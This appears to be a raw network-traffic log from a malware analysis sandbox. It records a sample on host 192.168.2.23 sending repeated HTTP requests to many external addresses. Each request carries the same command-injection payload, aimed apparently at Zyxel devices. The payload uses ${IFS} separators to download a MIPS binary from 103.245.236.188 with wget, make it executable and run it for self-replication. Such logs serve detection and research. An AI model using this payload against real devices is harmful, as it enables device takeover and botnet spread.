                                                Jan 12, 2024 18:16:40.855278015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8783192.168.2.2349926196.51.151.241443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.855304956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8784192.168.2.234549082.128.120.137443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.855335951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8785192.168.2.2342928113.99.227.11443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.855376005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8786192.168.2.2334712131.189.113.10443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.855431080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8787192.168.2.2337110111.180.65.2443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.855474949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8788192.168.2.2355246134.103.4.199443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.855506897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8789192.168.2.2349994166.53.137.50443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.855542898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8790192.168.2.2356260137.108.162.29443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.855568886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8791192.168.2.2344968219.147.225.177443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.855591059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8792192.168.2.2337456132.86.193.151443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.855638027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8793192.168.2.235160094.66.145.239443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.855678082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8794192.168.2.2339174189.75.48.240443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.855722904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8795192.168.2.2334572160.79.27.119443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.855751038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8796192.168.2.234627467.254.175.203443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.855784893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8797192.168.2.23555102.189.201.175443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.855853081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8798192.168.2.235272637.235.170.229443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.855874062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8799192.168.2.233293836.150.76.95443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.855912924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8800192.168.2.2354184193.121.49.246443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.855947971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8801192.168.2.233500479.97.125.54443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.856000900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8802192.168.2.234820824.88.75.4443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.856024981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8803192.168.2.2354820154.110.147.122443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.856071949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8804192.168.2.2335472162.27.103.190443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.856086969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8805192.168.2.233725258.87.194.159443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.856154919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8806192.168.2.23555064.90.128.215443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.856185913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8807192.168.2.234665625.98.171.58443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.856239080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8808192.168.2.233323261.53.59.48443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.856255054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8809192.168.2.2359724157.42.57.89443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.856302977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8810192.168.2.2350570103.163.63.210443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.856353045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8811192.168.2.2345100197.114.221.106443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.856399059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8812192.168.2.234862238.152.97.49443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.856450081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8813192.168.2.23511209.161.139.38443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.856482029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8814192.168.2.233912675.94.154.84443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.856511116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8815192.168.2.234996472.15.92.113443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.856569052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8816192.168.2.2334274145.125.130.242443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.856581926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8817192.168.2.234205079.59.35.42443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.856618881 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8818192.168.2.23386981.53.135.236443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.856654882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8819192.168.2.2350898148.200.72.243443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.856714010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8820192.168.2.2353350175.11.77.240443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.856734037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8821192.168.2.2346148119.157.7.150443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.856761932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8822192.168.2.2346120120.124.125.24443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.856807947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8823192.168.2.234924819.117.51.0443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.856848955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8824192.168.2.233474842.210.162.5443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.856888056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8825192.168.2.233410863.207.39.168443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.856921911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8826192.168.2.2351474156.248.73.215443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.856959105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8827192.168.2.2354480196.87.235.57443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.856982946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8828192.168.2.234175645.176.129.178443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.857022047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8829192.168.2.2355150221.186.0.51443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.857055902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8830192.168.2.233676623.60.166.195443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.857080936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8831192.168.2.2358488116.204.4.77443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.857126951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8832192.168.2.235563824.45.100.198443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.857155085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8833192.168.2.235653666.25.239.35443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.857188940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8834192.168.2.234846869.214.0.157443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.857229948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8835192.168.2.2342272197.182.134.242443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.857255936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8836192.168.2.2338176131.129.180.63443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.857297897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8837192.168.2.2345184191.125.181.252443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.857322931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8838192.168.2.2335092178.49.1.101443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.857372999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8839192.168.2.2359316220.161.238.164443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.857419014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8840192.168.2.2359622202.240.151.176443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.857445002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8841192.168.2.235376875.21.157.130443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.857487917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8842192.168.2.236065658.130.67.14443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.857543945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8843192.168.2.235100662.101.119.14443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.857578993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8844192.168.2.236023047.196.178.46443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.857637882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8845192.168.2.2360372148.163.221.52443
                                                TimestampBytes transferredDirectionData
